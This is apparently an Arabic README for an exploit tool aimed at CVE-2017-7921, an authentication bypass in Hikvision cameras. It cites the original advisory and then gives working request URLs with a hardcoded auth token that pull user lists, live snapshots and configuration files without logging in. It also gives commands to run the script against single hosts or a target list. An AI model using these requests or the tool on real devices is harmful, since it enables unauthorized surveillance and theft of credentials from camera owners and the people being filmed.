
استغلال لـ CVE-2017-7921 يستهدف أجهزة Hikvision ذات المصادقة غير الصحيحة. يقوم باستخراج قوائم المستخدمين، لقطات الكاميرا، وملفات الإعدادات عبر طلبات HTTP مصممة خصيصاً.
تم اكتشاف مشكلة مصادقة غير صحيحة في أجهزة Hikvision.
تحدث ثغرة المصادقة غير الصحيحة عندما لا يقوم التطبيق بمصادقة المستخدمين بشكل كافٍ أو صحيح.
قد يسمح ذلك لمستخدم ضار بتصعيد صلاحياته على النظام والوصول إلى معلومات حساسة.
# inj3ction
https://seclists.org/fulldisclosure/2017/Sep/23
تفاصيل الثغرة:
----------------------
الحصول على قائمة بجميع المستخدمين وأدوارهم:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
الحصول على لقطة من الكاميرا دون مصادقة:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
والأسوأ من ذلك، يمكن تنزيل إعدادات الكاميرا:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
